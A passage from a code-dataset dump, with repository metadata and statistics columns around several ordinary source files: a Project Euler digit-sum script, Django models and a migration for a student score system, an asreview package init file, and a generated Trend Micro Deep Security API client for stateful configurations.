"Unlicense"
] | null | null | null |
problem_016.py
|
wurfkeks/project-euler
|
782c459546ae0d98ce20ce0bbcde3fed3adaab06
|
[
"Unlicense"
] | null | null | null |
problem_016.py
|
wurfkeks/project-euler
|
782c459546ae0d98ce20ce0bbcde3fed3adaab06
|
[
"Unlicense"
] | null | null | null |
a=2**1000
b=0
while a > 0:
b += (a%10)
a /= 10
print b
| 9
| 15
| 0.444444
| 15
| 63
| 1.866667
| 0.533333
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.268293
| 0.349206
| 63
| 6
| 16
| 10.5
| 0.414634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.166667
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
feef6a713f1ab0535e375a743efab2334bb93bce
| 2,690
|
py
|
Python
|
SPIWork/Server/NaiveScoreMS/apps/users/models.py
|
happylrd/buptsse-workbooks
|
0c98d5b475abdabd47bb9f406d32f60d49cddfa7
|
[
"MIT"
] | null | null | null |
SPIWork/Server/NaiveScoreMS/apps/users/models.py
|
happylrd/buptsse-workbooks
|
0c98d5b475abdabd47bb9f406d32f60d49cddfa7
|
[
"MIT"
] | null | null | null |
SPIWork/Server/NaiveScoreMS/apps/users/models.py
|
happylrd/buptsse-workbooks
|
0c98d5b475abdabd47bb9f406d32f60d49cddfa7
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from __future__ import unicode_literals
from datetime import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
class Student(models.Model):
username = models.CharField(max_length=30, unique=True, verbose_name='用户名')
password = models.CharField(max_length=128, verbose_name='密码')
realname = models.CharField(max_length=10, verbose_name='姓名')
mobile = models.CharField(max_length=11, null=True, blank=True, verbose_name='手机号')
school = models.CharField(max_length=20, verbose_name='学院')
major = models.CharField(max_length=30, verbose_name='专业')
gender = models.CharField(max_length=6, choices=(('male', '男'), ('female', '女')), default='female',
verbose_name='性别')
birthday = models.DateField(null=True, blank=True, verbose_name='生日')
permission_type = models.IntegerField(choices=((0, '一般'), (1, '添加'), (2, '检查')), default=0, verbose_name='权限类型')
add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
class Meta:
verbose_name = '学生信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.username
class Teacher(models.Model):
username = models.CharField(max_length=30, unique=True, verbose_name='用户名')
password = models.CharField(max_length=128, verbose_name='密码')
realname = models.CharField(max_length=10, verbose_name='姓名')
mobile = models.CharField(max_length=11, null=True, blank=True, verbose_name='手机号')
school = models.CharField(max_length=20, verbose_name='学院')
gender = models.CharField(max_length=6, choices=(('male', '男'), ('female', '女')), default='female',
verbose_name='性别')
birthday = models.DateField(null=True, blank=True, verbose_name='生日')
add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
class Meta:
verbose_name = '教师信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.username
class Administrator(AbstractUser):
realname = models.CharField(max_length=10, verbose_name='姓名')
mobile = models.CharField(max_length=11, null=True, blank=True, verbose_name='手机号')
gender = models.CharField(max_length=6, choices=(('male', '男'), ('female', '女')), default='female',
verbose_name='性别')
birthday = models.DateField(null=True, blank=True, verbose_name='生日')
add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
class Meta:
verbose_name = '管理员信息'
verbose_name_plural = verbose_name
def __unicode__(self):
return self.username
| 42.698413
| 116
| 0.686989
| 340
| 2,690
| 5.223529
| 0.238235
| 0.198198
| 0.162162
| 0.216216
| 0.841216
| 0.826577
| 0.826577
| 0.826577
| 0.826577
| 0.826577
| 0
| 0.016253
| 0.17658
| 2,690
| 62
| 117
| 43.387097
| 0.785553
| 0.004461
| 0
| 0.75
| 0
| 0
| 0.049327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.041667
| 0.083333
| 0.0625
| 0.8125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
feefcdbeee0c0675cc4ee42d7110ffbb2e893480
| 1,391
|
py
|
Python
|
Questionnaire/migrations/0002_auto_20200720_1100.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0002_auto_20200720_1100.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0002_auto_20200720_1100.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.2 on 2020-07-20 11:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Questionnaire', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='userresponse_common_features_test_set1',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_common_features_test_set2',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_common_features_test_set3',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_common_features_test_set4',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_test_set1',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_test_set2',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_test_set3',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_test_set4',
name='time_taken',
),
migrations.RemoveField(
model_name='userresponse_test_set5',
name='time_taken',
),
]
| 27.82
| 64
| 0.581596
| 124
| 1,391
| 6.16129
| 0.290323
| 0.247382
| 0.306283
| 0.353403
| 0.793194
| 0.793194
| 0.793194
| 0.793194
| 0.719895
| 0.719895
| 0
| 0.029724
| 0.322789
| 1,391
| 49
| 65
| 28.387755
| 0.781316
| 0.032351
| 0
| 0.627907
| 1
| 0
| 0.280506
| 0.19494
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
28c4185407075760c300d3e5130965f9191c1183
| 450
|
py
|
Python
|
asreview/entry_points/__init__.py
|
J535D165/asreview
|
eda3c52a595d739093c3cd6cd37d41eeed6dd15c
|
[
"Apache-2.0"
] | null | null | null |
asreview/entry_points/__init__.py
|
J535D165/asreview
|
eda3c52a595d739093c3cd6cd37d41eeed6dd15c
|
[
"Apache-2.0"
] | null | null | null |
asreview/entry_points/__init__.py
|
J535D165/asreview
|
eda3c52a595d739093c3cd6cd37d41eeed6dd15c
|
[
"Apache-2.0"
] | null | null | null |
from asreview.entry_points.algorithms import AlgorithmsEntryPoint
from asreview.entry_points.base import BaseEntryPoint
from asreview.entry_points.lab import LABEntryPoint
from asreview.entry_points.lab import OracleEntryPoint
from asreview.entry_points.lab import WebRunModelEntryPoint
from asreview.entry_points.simulate import BatchEntryPoint
from asreview.entry_points.simulate import SimulateEntryPoint
"""Default entry points for asreview."""
| 45
| 65
| 0.877778
| 54
| 450
| 7.185185
| 0.333333
| 0.226804
| 0.306701
| 0.414948
| 0.438144
| 0.438144
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075556
| 450
| 9
| 66
| 50
| 0.932692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
28eea53e87ee57c71562b671f25291e2db9bc259
| 32,287
|
py
|
Python
|
source/deepsecurity/api/stateful_configurations_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/stateful_configurations_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/stateful_configurations_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class StatefulConfigurationsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_stateful_configuration(self, stateful_configurations, api_version, **kwargs): # noqa: E501
"""Create a Stateful Configuration # noqa: E501
Create a new stateful configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_stateful_configuration(stateful_configurations, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param StatefulConfiguration stateful_configurations: The settings of the new stateful configuration. (required)
:param str api_version: The version of the api being called. (required)
:return: StatefulConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_stateful_configuration_with_http_info(stateful_configurations, api_version, **kwargs) # noqa: E501
else:
(data) = self.create_stateful_configuration_with_http_info(stateful_configurations, api_version, **kwargs) # noqa: E501
return data
def create_stateful_configuration_with_http_info(self, stateful_configurations, api_version, **kwargs): # noqa: E501
"""Create a Stateful Configuration # noqa: E501
Create a new stateful configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_stateful_configuration_with_http_info(stateful_configurations, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param StatefulConfiguration stateful_configurations: The settings of the new stateful configuration. (required)
:param str api_version: The version of the api being called. (required)
:return: StatefulConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stateful_configurations', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stateful_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stateful_configurations' is set
if ('stateful_configurations' not in params or
params['stateful_configurations'] is None):
raise ValueError("Missing the required parameter `stateful_configurations` when calling `create_stateful_configuration`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `create_stateful_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'stateful_configurations' in params:
body_params = params['stateful_configurations']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/statefulconfigurations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatefulConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stateful_configuration(self, stateful_configuration_id, api_version, **kwargs): # noqa: E501
"""Delete a Stateful Configuration # noqa: E501
Delete a stateful configuration by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_stateful_configuration(stateful_configuration_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int stateful_configuration_id: The ID number of the stateful configuration to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_stateful_configuration_with_http_info(stateful_configuration_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.delete_stateful_configuration_with_http_info(stateful_configuration_id, api_version, **kwargs) # noqa: E501
return data
def delete_stateful_configuration_with_http_info(self, stateful_configuration_id, api_version, **kwargs): # noqa: E501
"""Delete a Stateful Configuration # noqa: E501
Delete a stateful configuration by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_stateful_configuration_with_http_info(stateful_configuration_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int stateful_configuration_id: The ID number of the stateful configuration to delete. (required)
:param str api_version: The version of the api being called. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stateful_configuration_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stateful_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stateful_configuration_id' is set
if ('stateful_configuration_id' not in params or
params['stateful_configuration_id'] is None):
raise ValueError("Missing the required parameter `stateful_configuration_id` when calling `delete_stateful_configuration`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `delete_stateful_configuration`") # noqa: E501
if 'stateful_configuration_id' in params and not re.search('\\d+', str(params['stateful_configuration_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `stateful_configuration_id` when calling `delete_stateful_configuration`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'stateful_configuration_id' in params:
path_params['statefulConfigurationID'] = params['stateful_configuration_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/statefulconfigurations/{statefulConfigurationID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def describe_stateful_configuration(self, stateful_configuration_id, api_version, **kwargs): # noqa: E501
"""Describe a Stateful Configuration # noqa: E501
Describe a stateful configuration by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_stateful_configuration(stateful_configuration_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int stateful_configuration_id: The ID number of the stateful configuration to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: StatefulConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_stateful_configuration_with_http_info(stateful_configuration_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_stateful_configuration_with_http_info(stateful_configuration_id, api_version, **kwargs) # noqa: E501
return data
def describe_stateful_configuration_with_http_info(self, stateful_configuration_id, api_version, **kwargs): # noqa: E501
"""Describe a Stateful Configuration # noqa: E501
Describe a stateful configuration by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_stateful_configuration_with_http_info(stateful_configuration_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int stateful_configuration_id: The ID number of the stateful configuration to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: StatefulConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stateful_configuration_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method describe_stateful_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stateful_configuration_id' is set
if ('stateful_configuration_id' not in params or
params['stateful_configuration_id'] is None):
raise ValueError("Missing the required parameter `stateful_configuration_id` when calling `describe_stateful_configuration`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `describe_stateful_configuration`") # noqa: E501
if 'stateful_configuration_id' in params and not re.search('\\d+', str(params['stateful_configuration_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `stateful_configuration_id` when calling `describe_stateful_configuration`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'stateful_configuration_id' in params:
path_params['statefulConfigurationID'] = params['stateful_configuration_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/statefulconfigurations/{statefulConfigurationID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatefulConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_stateful_configurations(self, api_version, **kwargs): # noqa: E501
"""List Stateful Configurations # noqa: E501
Lists all stateful configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_stateful_configurations(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: StatefulConfigurations
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_stateful_configurations_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.list_stateful_configurations_with_http_info(api_version, **kwargs) # noqa: E501
return data
def list_stateful_configurations_with_http_info(self, api_version, **kwargs): # noqa: E501
"""List Stateful Configurations # noqa: E501
Lists all stateful configurations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_stateful_configurations_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: StatefulConfigurations
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_stateful_configurations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `list_stateful_configurations`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/statefulconfigurations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatefulConfigurations', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_stateful_configuration(self, stateful_configuration_id, stateful_configuration, api_version, **kwargs): # noqa: E501
"""Modify a Stateful Configuration # noqa: E501
Modify a stateful configuration by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_stateful_configuration(stateful_configuration_id, stateful_configuration, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int stateful_configuration_id: The ID number of the stateful configuration to modify. (required)
:param StatefulConfiguration stateful_configuration: The settings of the stateful configuration to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: StatefulConfiguration
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_stateful_configuration_with_http_info(stateful_configuration_id, stateful_configuration, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_stateful_configuration_with_http_info(stateful_configuration_id, stateful_configuration, api_version, **kwargs) # noqa: E501
return data
def modify_stateful_configuration_with_http_info(self, stateful_configuration_id, stateful_configuration, api_version, **kwargs): # noqa: E501
"""Modify a Stateful Configuration # noqa: E501
Modify a stateful configuration by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_stateful_configuration_with_http_info(stateful_configuration_id, stateful_configuration, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int stateful_configuration_id: The ID number of the stateful configuration to modify. (required)
:param StatefulConfiguration stateful_configuration: The settings of the stateful configuration to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: StatefulConfiguration
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stateful_configuration_id', 'stateful_configuration', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_stateful_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stateful_configuration_id' is set
if ('stateful_configuration_id' not in params or
params['stateful_configuration_id'] is None):
raise ValueError("Missing the required parameter `stateful_configuration_id` when calling `modify_stateful_configuration`") # noqa: E501
# verify the required parameter 'stateful_configuration' is set
if ('stateful_configuration' not in params or
params['stateful_configuration'] is None):
raise ValueError("Missing the required parameter `stateful_configuration` when calling `modify_stateful_configuration`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_stateful_configuration`") # noqa: E501
if 'stateful_configuration_id' in params and not re.search('\\d+', str(params['stateful_configuration_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `stateful_configuration_id` when calling `modify_stateful_configuration`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'stateful_configuration_id' in params:
path_params['statefulConfigurationID'] = params['stateful_configuration_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'stateful_configuration' in params:
body_params = params['stateful_configuration']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/statefulconfigurations/{statefulConfigurationID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatefulConfiguration', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_stateful_configurations(self, api_version, **kwargs): # noqa: E501
"""Search Stateful Configurations # noqa: E501
Search for stateful configurations using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_stateful_configurations(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: StatefulConfigurations
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_stateful_configurations_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.search_stateful_configurations_with_http_info(api_version, **kwargs) # noqa: E501
return data
def search_stateful_configurations_with_http_info(self, api_version, **kwargs): # noqa: E501
"""Search Stateful Configurations # noqa: E501
Search for stateful configurations using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_stateful_configurations_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: StatefulConfigurations
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version', 'search_filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_stateful_configurations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `search_stateful_configurations`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'search_filter' in params:
body_params = params['search_filter']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/statefulconfigurations/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StatefulConfigurations', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 47.55081
| 311
| 0.641311
| 3,531
| 32,287
| 5.607477
| 0.058624
| 0.143182
| 0.062727
| 0.024242
| 0.953636
| 0.949091
| 0.940556
| 0.928737
| 0.924394
| 0.918182
| 0
| 0.015163
| 0.278936
| 32,287
| 678
| 312
| 47.620944
| 0.835316
| 0.33481
| 0
| 0.781421
| 0
| 0
| 0.257573
| 0.128838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035519
| false
| 0
| 0.010929
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a9e4992e042a97847f613df548a5782a3276fc9
| 137
|
py
|
Python
|
catalyst/contrib/models/nlp/__init__.py
|
